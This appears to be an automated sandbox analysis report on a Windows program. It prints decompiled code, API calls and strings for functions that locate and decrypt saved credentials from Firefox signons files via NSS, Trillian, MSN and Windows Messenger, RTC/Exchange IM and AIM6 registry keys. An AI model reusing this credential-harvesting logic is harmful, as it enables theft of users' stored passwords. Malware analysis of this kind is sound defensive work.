                                  • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                  • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                • LocalFree.KERNEL32(0040DCC1,75D6F420,?,?,?,75D6F420,00000000), ref: 00410500
                                • RegCloseKey.KERNELBASE(?,?,75D6F420,00000000,?,0040DCC1,?), ref: 00410512
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                • API String ID: 2768085393-1693574875
                                • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004064FB, Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E004064FB(void* __eax, intOrPtr _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void _v275;
				char _v276;
				void _v539;
				char _v540;
				void _v803;
				char _v804;
				void _v1067;
				char _v1068;
				void* __ebx;
				void* __edi;
				signed int _t53;
				signed int _t54;
				int _t61;
				int _t64;
				int _t67;
				void* _t71;
				void* _t73;
				void* _t75;
				intOrPtr* _t76;
				intOrPtr _t115;

				_v8 = _v8 & 0x00000000;
				_t115 = _a4 + 4;
				_v12 = _t115;
				0x410c4c(); // executed
				if(__eax != 0) {
					_v1068 = 0;
					memset( &_v1067, 0, 0x104);
					E00406958(0x104,  &_v1068, _a8);
					_t53 =  *(_t115 + 4);
					if(_t53 == 0) {
						_t54 = _t53 | 0xffffffff;
						__eflags = _t54;
					} else {
						_t54 =  *_t53( &_v1068);
					}
					if(_t54 == 0) {
						_v276 = 0;
						memset( &_v275, 0, 0x104);
						_v804 = 0;
						memset( &_v803, 0, 0x104);
						_v540 = 0;
						memset( &_v539, 0, 0x104);
						_t61 = strlen(_a8);
						_t19 = strlen(0x4181fc) + 1; // 0x1
						if(_t61 + _t19 >= 0x104) {
							_v276 = 0;
						} else {
							E00406B4B( &_v276, _a8, 0x4181fc);
						}
						_t64 = strlen(_a8);
						_t25 = strlen(0x418208) + 1; // 0x1
						if(_t64 + _t25 >= 0x104) {
							_v804 = 0;
						} else {
							E00406B4B( &_v804, _a8, 0x418208);
						}
						_t67 = strlen(_a8);
						_t31 = strlen(0x418218) + 1; // 0x1
						if(_t67 + _t31 >= 0x104) {
							_v540 = 0;
						} else {
							E00406B4B( &_v540, _a8, 0x418218);
						}
						_t71 = E004069D3( &_v276);
						_t131 = _t71;
						if(_t71 != 0) {
							E004062DB(_t131, _a4,  &_v276);
						}
						_t73 = E004069D3( &_v804);
						_t132 = _t73;
						if(_t73 != 0) {
							E004062DB(_t132, _a4,  &_v804);
						}
						_t75 = E004069D3( &_v540);
						_t133 = _t75;
						if(_t75 != 0) {
							E004062DB(_t133, _a4,  &_v540);
						}
						_t76 =  *((intOrPtr*)(_v12 + 8));
						_v8 = 1;
						if(_t76 != 0) {
							 *_t76();
						}
					}
					0x410d6f();
				}
				return _v8;
			}

























                                0x00406504
                                0x0040650d
                                0x00406511
                                0x00406514
                                0x0040651b
                                0x00406530
                                0x00406537
                                0x00406548
                                0x0040654d
                                0x00406555
                                0x00406563
                                0x00406563
                                0x00406557
                                0x0040655e
                                0x00406560
                                0x00406568
                                0x00406577
                                0x0040657e
                                0x0040658f
                                0x00406596
                                0x004065a7
                                0x004065ae
                                0x004065b9
                                0x004065cc
                                0x004065d3
                                0x004065e8
                                0x004065d5
                                0x004065df
                                0x004065e5
                                0x004065f2
                                0x00406605
                                0x0040660c
                                0x00406621
                                0x0040660e
                                0x00406618
                                0x0040661e
                                0x0040662b
                                0x0040663e
                                0x00406645
                                0x0040665a
                                0x00406647
                                0x00406651
                                0x00406657
                                0x00406668
                                0x0040666d
                                0x00406670
                                0x0040667c
                                0x0040667c
                                0x00406688
                                0x0040668d
                                0x00406690
                                0x0040669c
                                0x0040669c
                                0x004066a8
                                0x004066ad
                                0x004066b0
                                0x004066bc
                                0x004066bc
                                0x004066c4
                                0x004066c9
                                0x004066d0
                                0x004066d2
                                0x004066d2
                                0x004066d0
                                0x004066d4
                                0x004066d4
                                0x004066e0

                                APIs
                                  • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                  • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                  • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                  • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                  • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                  • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                  • Part of subcall function 00410C4C: LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                  • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                • memset.MSVCRT ref: 00406537
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                • memset.MSVCRT ref: 0040657E
                                • memset.MSVCRT ref: 00406596
                                • memset.MSVCRT ref: 004065AE
                                • strlen.MSVCRT ref: 004065B9
                                • strlen.MSVCRT ref: 004065C7
                                • strlen.MSVCRT ref: 004065F2
                                • strlen.MSVCRT ref: 00406600
                                • strlen.MSVCRT ref: 0040662B
                                • strlen.MSVCRT ref: 00406639
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                  • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                  • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                  • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                  • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                  • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                  • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                • String ID: signons.txt$signons2.txt$signons3.txt
                                • API String ID: 4081699353-561706229
                                • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D3A0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 60%
                                			E0040D3A0(char* _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t20;
				int _t24;
				char _t28;
				void* _t39;
				char* _t56;
				char* _t60;
				char* _t62;
				char* _t63;
				void* _t64;

				_t56 = _a4;
				 *_t56 = 0;
				_v268 = 0;
				_t20 = memset( &_v267, 0, 0x104);
				_t60 =  &_v268;
				0x411dae(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian", "UninstallString", 0x104); // executed
				if(_t20 != 0) {
					_t39 = E00407139(0, "trillian.exe");
					if(_t39 > 0) {
						 *((char*)(_t64 + _t39 - 0x109)) = 0;
						if(E004069D3(_t60) != 0) {
							0x413d0c(_t56, _t60);
						}
					}
				}
				if( *_t56 == 0) {
					_v268 = 0;
					0x41212c(); // executed
					_t63 =  &_v268;
					E0040680E(_t63);
					E00406958(0x104, _t63, "trillian");
					if(E004069D3(_t63) != 0) {
						0x413d0c(_a4, _t63);
					}
				}
				_v532 = 0;
				memset( &_v531, 0, 0x104);
				0x41223f(0x1a); // executed
				_t62 = _a4 + 0x105;
				_t24 = strlen("Trillian\users\global");
				_t17 = strlen( &_v532) + 1; // 0x1
				if(_t24 + _t17 >= 0x104) {
					 *_t62 = 0;
				} else {
					E00406B4B(_t62,  &_v532, "Trillian\users\global");
				}
				_t28 = E004069D3(_t62);
				if(_t28 == 0) {
					 *_t62 = _t28;
					return _t28;
				}
				return _t28;
			}



















                                0x0040d3ac
                                0x0040d3be
                                0x0040d3c1
                                0x0040d3c8
                                0x0040d3dd
                                0x0040d3e3
                                0x0040d3ed
                                0x0040d3f8
                                0x0040d400
                                0x0040d402
                                0x0040d415
                                0x0040d41b
                                0x0040d421
                                0x0040d415
                                0x0040d400
                                0x0040d425
                                0x0040d42d
                                0x0040d434
                                0x0040d439
                                0x0040d43f
                                0x0040d44b
                                0x0040d45c
                                0x0040d464
                                0x0040d46a
                                0x0040d45c
                                0x0040d475
                                0x0040d47c
                                0x0040d48a
                                0x0040d497
                                0x0040d49d
                                0x0040d4b0
                                0x0040d4b9
                                0x0040d4d2
                                0x0040d4bb
                                0x0040d4c9
                                0x0040d4cf
                                0x0040d4d6
                                0x0040d4de
                                0x0040d4e0
                                0x00000000
                                0x0040d4e0
                                0x0040d4e6

                                APIs
                                • memset.MSVCRT ref: 0040D3C8
                                  • Part of subcall function 00411DAE: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000), ref: 00411DE3
                                • _mbscpy.MSVCRT ref: 0040D41B
                                • _mbscpy.MSVCRT ref: 0040D464
                                • memset.MSVCRT ref: 0040D47C
                                • strlen.MSVCRT ref: 0040D49D
                                • strlen.MSVCRT ref: 0040D4AB
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                  • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                  • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                • API String ID: 2174551368-3003071570
                                • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413E10, Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                • String ID:
                                • API String ID: 3662548030-0
                                • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DA79, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E0040DA79(intOrPtr* _a4) {
				void* _v12;
				int _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				int _v40;
				intOrPtr _v48;
				char _v52;
				int _v56;
				int _v60;
				char _v64;
				intOrPtr _v76;
				int _v84;
				int _v88;
				int _v344;
				int _v600;
				char _v856;
				char _v1112;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t73;
				long _t75;
				void** _t76;
				long _t78;
				long _t80;
				char* _t81;
				long _t83;
				char* _t84;
				int _t96;
				int _t115;
				int* _t132;
				int* _t134;
				int* _t136;

				_t115 = 0;
				_v20 = 1;
				_v76 = 0x418ad8;
				_v64 = 0;
				_v56 = 0;
				_v60 = 0;
				0x40fd01();
				_v16 = 0;
				do {
					if(_v16 != _t115) {
						if(_v16 != 1) {
							_t73 =  &_v1112;
							0x40ff88(_t73); // executed
						} else {
							_t75 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
							if(_t75 != 0) {
								goto L5;
							} else {
								_t76 =  &_v12;
								goto L4;
							}
						}
					} else {
						_t78 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MSNMessenger", _t115, 0x20019,  &_v24); // executed
						if(_t78 != 0) {
							L5:
							_t73 = 0;
						} else {
							_t76 =  &_v24;
							L4:
							_t73 =  &_v1112;
							0x40fe5d(_t73, _t76);
						}
					}
					if(_t73 != _t115) {
						_v600 = _t115;
						_v344 = _t115;
						_v88 = _t115;
						_v84 = _t115;
						E00406958(0xff,  &_v344,  &_v856);
						_t132 =  &_v600;
						E00406958(0xff, _t132,  &_v1112);
						_v84 = 1;
						_v88 = 1;
						 *((intOrPtr*)( *_a4))(_t132);
						_t115 = 0;
					}
					_v16 = _v16 + 1;
				} while (_v16 < 3);
				_t80 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t80 != 0) {
					_t81 = 0;
				} else {
					_t81 =  &_v1112;
					0x40fd2e("UserMicrosoft RTC Instant Messaging", "PasswordMicrosoft RTC Instant Messaging", _t81,  &_v12);
				}
				if(_t81 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t136 =  &_v600;
					E00406958(0xff, _t136,  &_v1112);
					_v84 = 9;
					_v88 = 0xa;
					_v20 =  *((intOrPtr*)( *_a4))(_t136);
					_t115 = 0;
				}
				_t83 = RegOpenKeyExA(0x80000001, "Software\Microsoft\MessengerService", _t115, 0x20019,  &_v12); // executed
				if(_t83 != 0) {
					_t84 = 0;
				} else {
					_t84 =  &_v1112;
					0x40fd2e("UserMicrosoft Exchange Instant Messaging", "PasswordMicrosoft Exchange Instant Messaging", _t84,  &_v12);
				}
				if(_t84 != _t115) {
					_v600 = _t115;
					_v344 = _t115;
					_v88 = _t115;
					_v84 = _t115;
					E00406958(0xff,  &_v344,  &_v856);
					_t134 =  &_v600;
					E00406958(0xff, _t134,  &_v1112);
					_t96 = 0xa;
					_v84 = _t96;
					_v88 = _t96;
					_v20 =  *((intOrPtr*)( *_a4))(_t134);
					_t115 = 0;
				}
				_v28 = _a4;
				_v40 = _t115;
				_v32 = _t115;
				_v36 = _t115;
				_v52 = 0x418ae0;
				0x4103f1( &_v52); // executed
				0x410205( &_v52);
				if(_v48 == _t115) {
					0x410383( &_v52); // executed
				}
				E00404CE0( &_v40);
				E00404CE0( &_v64);
				return _v20;
			}







































                                0x0040da84
                                0x0040da8d
                                0x0040da94
                                0x0040da9b
                                0x0040da9e
                                0x0040daa1
                                0x0040daa4
                                0x0040daaf
                                0x0040dab2
                                0x0040dab5
                                0x0040daeb
                                0x0040db0c
                                0x0040db13
                                0x0040daed
                                0x0040db01
                                0x0040db05
                                0x00000000
                                0x0040db07
                                0x0040db07
                                0x00000000
                                0x0040db07
                                0x0040db05
                                0x0040dab7
                                0x0040dacb
                                0x0040dacf
                                0x0040dae3
                                0x0040dae3
                                0x0040dad1
                                0x0040dad1
                                0x0040dad4
                                0x0040dad5
                                0x0040dadc
                                0x0040dadc
                                0x0040dacf
                                0x0040db1a
                                0x0040db22
                                0x0040db28
                                0x0040db2e
                                0x0040db31
                                0x0040db40
                                0x0040db4d
                                0x0040db53
                                0x0040db61
                                0x0040db64
                                0x0040db6a
                                0x0040db6c
                                0x0040db6c
                                0x0040db6e
                                0x0040db71
                                0x0040db8f
                                0x0040db93
                                0x0040dbb1
                                0x0040db95
                                0x0040db99
                                0x0040dbaa
                                0x0040dbaa
                                0x0040dbb5
                                0x0040dbbd
                                0x0040dbc3
                                0x0040dbc9
                                0x0040dbcc
                                0x0040dbdb
                                0x0040dbe8
                                0x0040dbee
                                0x0040dbfc
                                0x0040dc03
                                0x0040dc0c
                                0x0040dc0f
                                0x0040dc0f
                                0x0040dc25
                                0x0040dc29
                                0x0040dc47
                                0x0040dc2b
                                0x0040dc2f
                                0x0040dc40
                                0x0040dc40
                                0x0040dc4b
                                0x0040dc53
                                0x0040dc59
                                0x0040dc5f
                                0x0040dc62
                                0x0040dc71
                                0x0040dc7e
                                0x0040dc84
                                0x0040dc8f
                                0x0040dc92
                                0x0040dc95
                                0x0040dc9d
                                0x0040dca0
                                0x0040dca0
                                0x0040dca5
                                0x0040dcac
                                0x0040dcaf
                                0x0040dcb2
                                0x0040dcb5
                                0x0040dcbc
                                0x0040dcc5
                                0x0040dccd
                                0x0040dcd3
                                0x0040dcd3
                                0x0040dcdb
                                0x0040dce3
                                0x0040dcef

                                APIs
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                  • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                  • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                  • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                Strings
                                • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Open$ByteCharMultiWidememset$FreeLocal
                                • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                • API String ID: 3472595403-3472580514
                                • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BBF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E0040BBF0(void* __eax, intOrPtr _a4) {
				void _v267;
				char _v268;
				char _v531;
				char _v792;
				intOrPtr _v796;
				char _v800;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t31;
				WINDOWPLACEMENT* _t43;
				void* _t45;
				char* _t49;
				struct HWND__* _t50;
				intOrPtr _t52;
				int _t56;

				_t45 = __eax;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				GetModuleFileNameA(0,  &_v268, 0x104);
				_t31 = strrchr( &_v268, 0x2e);
				if(_t31 != 0) {
					 *_t31 = 0;
				}
				0x413cf4( &_v268, ".cfg");
				_v796 = _a4;
				_v800 = 0x419084;
				_v792 = 0;
				_v531 = 0;
				0x413d0c( &_v792,  &_v268);
				0x413d0c( &_v531, "General");
				E004039A8( *((intOrPtr*)(_t45 + 0x38c)),  &_v800); // executed
				_t52 = _v796;
				_t56 = 0x2c;
				if(_t52 != 0) {
					_t50 =  *(_t45 + 0x108);
					if(_t50 != 0) {
						_t43 = _t45 + 0x144;
						_t43->length = _t56;
						GetWindowPlacement(_t50, _t43);
					}
				}
				_t49 =  &_v800;
				 *((intOrPtr*)(_v800 + 0xc))("WinPos", _t45 + 0x144, _t56);
				if(_t52 == 0) {
					E00402D81(_t45);
				}
				return E0040946F( *((intOrPtr*)(_t45 + 0x390)), _t49,  &_v800);
			}



















                                0x0040bc02
                                0x0040bc0d
                                0x0040bc14
                                0x0040bc26
                                0x0040bc35
                                0x0040bc3e
                                0x0040bc40
                                0x0040bc40
                                0x0040bc4f
                                0x0040bc57
                                0x0040bc6b
                                0x0040bc75
                                0x0040bc7c
                                0x0040bc83
                                0x0040bc94
                                0x0040bca8
                                0x0040bcad
                                0x0040bcb7
                                0x0040bcb8
                                0x0040bcba
                                0x0040bcc2
                                0x0040bcc4
                                0x0040bccc
                                0x0040bcce
                                0x0040bcce
                                0x0040bcc2
                                0x0040bce7
                                0x0040bced
                                0x0040bcf2
                                0x0040bcf4
                                0x0040bcf4
                                0x0040bd0e

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                • String ID: .cfg$General$WinPos
                                • API String ID: 1012775001-3165880290
                                • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040260A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                • memset.MSVCRT ref: 0040265A
                                • memset.MSVCRT ref: 00402676
                                • wcscpy.MSVCRT ref: 004026BD
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                • RegCloseKey.ADVAPI32(?), ref: 00402724
                                Strings
                                • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$CloseEnumOpenValuewcscpy
                                • String ID: Software\America Online\AIM6\Passwords
                                • API String ID: 295685061-818317896
                                • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004039A8, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E004039A8(void* __edi, intOrPtr* __esi) {
				void _v259;
				char _v260;
				char _v2088;
				void* _t40;
				void* _t44;
				void* _t47;
				intOrPtr* _t68;
				void* _t69;
				void* _t70;

				_t68 = __esi;
				_t70 = _t69 - 0x824;
				_t47 = 0;
				_push(0);
				_push(__edi + 0x728);
				_push("ShowGridLines");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x72c);
				_push("SaveFilterIndex");
				 *((intOrPtr*)( *__esi + 8))();
				_push(0);
				_push(__edi + 0x730);
				_push("AddExportHeaderLine");
				 *((intOrPtr*)( *__esi + 4))();
				_push(0);
				_push(__edi + 0x734);
				_push("MarkOddEvenRows");
				 *((intOrPtr*)( *__esi + 4))();
				E0040D725(E0040D339( &_v2088), 0);
				do {
					_v260 = 0;
					memset( &_v259, 0, 0xfe);
					_push(_t47);
					sprintf( &_v260, "Folder%d");
					_t70 = _t70 + 0x18;
					if( *((intOrPtr*)(_t68 + 4)) == 0) {
						L4:
						_t40 =  *((intOrPtr*)( *_t68 + 0x10))( &_v260, E0040D362(_t47), E0040D362(_t47), 0x104);
					} else {
						_t44 = E0040D362(_t47);
						0x413dce(_t44, E0040D362(_t47));
						if(_t44 != 0) {
							goto L4;
						} else {
							_t40 =  *((intOrPtr*)( *_t68 + 0x1c))( &_v260);
						}
					}
					_t47 = _t47 + 1;
				} while (_t47 < 7);
				return _t40;
			}












                                0x004039a8
                                0x004039ad
                                0x004039b4
                                0x004039b6
                                0x004039bd
                                0x004039be
                                0x004039c5
                                0x004039ca
                                0x004039d1
                                0x004039d2
                                0x004039d9
                                0x004039de
                                0x004039e5
                                0x004039e6
                                0x004039ed
                                0x004039f2
                                0x004039f9
                                0x004039fa
                                0x00403a01
                                0x00403a0f
                                0x00403a14
                                0x00403a22
                                0x00403a29
                                0x00403a2e
                                0x00403a3b
                                0x00403a40
                                0x00403a47
                                0x00403a7c
                                0x00403aa4
                                0x00403a49
                                0x00403a5b
                                0x00403a61
                                0x00403a6a
                                0x00000000
                                0x00403a6c
                                0x00403a77
                                0x00403a77
                                0x00403a6a
                                0x00403aa7
                                0x00403aa8
                                0x00403ab3

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpimemsetsprintf
                                • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                • API String ID: 1148023869-3238971583
